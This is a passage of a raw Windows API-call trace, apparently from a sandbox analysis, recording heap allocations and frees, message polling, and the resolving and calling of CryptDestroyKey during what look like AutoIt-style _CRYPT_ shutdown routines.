wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0139.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0139.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0139.225] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0139.226] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0139.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.226] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0139.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0139.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0139.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.227] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0139.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.227] CryptDestroyKey (hKey=0xa87610) returned 1 [0139.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0139.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0139.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0139.229] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0139.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0139.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0139.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.229] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0139.229] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.229] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0139.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0139.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.230] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0139.230] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0139.230] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0139.230] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0139.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.231] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.231] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0139.231] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.231] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.231] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0139.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0139.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.353] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.353] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.353] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.353] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0139.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0139.354] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.354] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.354] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.354] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.354] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.354] 